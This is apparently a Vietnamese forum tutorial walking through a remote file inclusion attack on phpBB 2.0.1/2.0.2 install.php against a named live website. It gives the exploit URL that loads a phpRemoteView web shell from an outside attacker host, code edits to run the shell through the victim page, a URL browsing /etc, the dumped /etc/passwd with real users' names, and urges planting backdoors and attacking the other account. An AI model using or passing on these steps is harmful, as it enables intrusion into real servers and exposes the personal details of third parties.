Lỗi sử dụng ở đây là lỗi trong file install.php của forum phpBB 2.0.1 và 2.0.2, các forum dạng này và dính lỗi này rát khổ biến trên NET và Luke đã không khó để có thể chọn random một site làm ví dụ
http://www.cyberantics.net/forum/ Bước 1:
Kiểm tra xem site đó còn file install.php hay không
http://www.cyberantics.net/forum/install.php và may mắn câu trả lời là có.
Chúng ta cần chú ý về mã nguồn PHP của nó một chút.
Quote
Và đồng thời tôi nhập URL sau
http://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.com/hainamluke/ kết quả nhận được là
Quote
*Index of /var/www/html/forum/ REMVIEW TOOLS
>> [dir commands]
type name size owner:group perms mtime
DIR admin hackman hackman drwxr-xr-x 20/05/02 08:28:36
DIR contrib hackman hackman drwxr-xr-x 20/05/02 08:28:37
DIR db hackman hackman drwxr-xr-x 20/05/02 08:28:38
DIR docs hackman hackman drwxr-xr-x 20/05/02 08:28:42
DIR images hackman hackman drwxr-xr-x 20/05/02 08:28:45
DIR includes hackman hackman drwxr-xr-x 20/05/02 08:28:47
DIR language hackman hackman drwxr-xr-x 20/05/02 08:28:47
DIR templates hackman hackman drwxr-xr-x 20/05/02 08:28:51
??/a> ??/a> common.php 5 316 hackman hackman -rw-r--r-- 20/05/02 08:28:36
??/a> ??/a> config.php 271 hackman hackman -rw-r--r-- 23/05/02 19:17:13
??/a> ??/a> extension.inc 810 hackman hackman -rw-r--r-- 20/05/02 08:28:42
??/a> ??/a> faq.php 3 596 hackman hackman -rw-r--r-- 20/05/02 08:28:42
??/a> ??/a> groupcp.php 45 881 hackman hackman -rw-r--r-- 20/05/02 08:28:42
??/a> ??/a> index.php 14 298 hackman hackman -rw-r--r-- 20/05/02 08:28:47
??/a> ??/a> install.php 33 617 hackman hackman -rw-r--r-- 20/05/02 08:28:47
??/a> ??/a> login.php 6 996 hackman hackman -rw-r--r-- 20/05/02 08:28:50
??/a> ??/a> memberlist.php 12 112 hackman hackman -rw-r--r-- 20/05/02 08:28:50
??/a> ??/a> modcp.php 33 764 hackman hackman -rw-r--r-- 20/05/02 08:28:50
??/a> ??/a> posting.php 34 073 hackman hackman -rw-r--r-- 20/05/02 08:28:50
??/a> ??/a> privmsg.php 68 622 hackman hackman -rw-r--r-- 20/05/02 08:28:51
??/a> ??/a> profile.php 3 834 hackman hackman -rw-r--r-- 20/05/02 08:28:51
??/a> ??/a> search.php 40 471 hackman hackman -rw-r--r-- 20/05/02 08:28:51
??/a> ??/a> update_to_201.php 24 899 hackman hackman -rw-r--r-- 20/05/02 08:29:08
??/a> ??/a> upgrade.php 57 040 hackman hackman -rw-r--r-- 20/05/02 08:29:08
??/a> ??/a> viewforum.php 23 181 hackman hackman -rw-r--r-- 20/05/02 08:29:09
??/a> ??/a> viewonline.php 7 231 hackman hackman -rw-r--r-- 20/05/02 08:29:09
??/a> ??/a> viewtopic.php 45 435 hackman hackman -rw-r--r-- 20/05/02 08:29:09
phpRemoteView, version 2002-08-05. Free download - php.spb.ru/remview
Nói vậy chắc các bạn cũng đã hiểu qua về lỗi này.
Nếu các bạn thay mã nguồn của file remview kia bằng một file dạng DBManager thì bạn có thể access tới toàn bộ DB của victim và lên Admin dễ dàng.
Bây giờ tôi xin nói chi tiết hơn về cách sử dụng remview dạng này.
Nếu bạn muốn sử dụng remview như là đang có một file thật trên server của victim thì bạn phải edit đoạn mã sau trong file
http://www21.brinkster/hainamluke/includes/functions_selects.php ########## FIND ###########
$self=$HTTP_SERVER_VARS['PHP_SELF'];
#########################
######### REPLACE #########
$self= "http://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.com/hainamluke/&";
#########################
Vậy là tạm ổn tuy nhiên cách sửa này chỉ áp dụng được với 50% công dụng của nó. Cụ thể là ko dùng được remview tools như shell command, upload, edit ..
Khi bạn nhập URL sau
http://www.cyberantics.net/forum/install.php?phpbb_root_dir=http://www21.brinkster.com/hainamluke/&c=l&d=%2Fetc bạn sẽ có kết quả như MSVN làm với VDC UNIX server .
Đối với các server khác các bạn nên dùng remview access sang các User, tìm điểm yếu nhất của nó (chmod 666 trở lên) và đặt một vài con Backdoor khác
Đây là một vài thông tin về server
::::::::::::::
/etc/passwd
::::::::::::::
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/bin/bash
gdm:x:42:42::/var/gdm:/sbin/nologin
apache:x:48:48:Apache:/var/www:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
named:x:25:25:Named:/var/named:/bin/false
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
ident:x:98:98:pident user:/:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/bin/nologin
squid:x:23:23::/var/spool/squid:/dev/null
mailnull:x:47:47::/var/spool/mqueue:/dev/null
ldap:x:55:55:LDAP User:/var/lib/ldap:/bin/false
hackman:x:500:500:Ramon Yvarra:/home/hackman:/bin/bash
ahleron:x:501:501:Jason Rogers:/home/ahleron:/bin/bash
--------------------------------------------------------------------------------
Server mới có 2 user là hackman và ahleron . Các bạn thử làm thịt thằng còn lại xem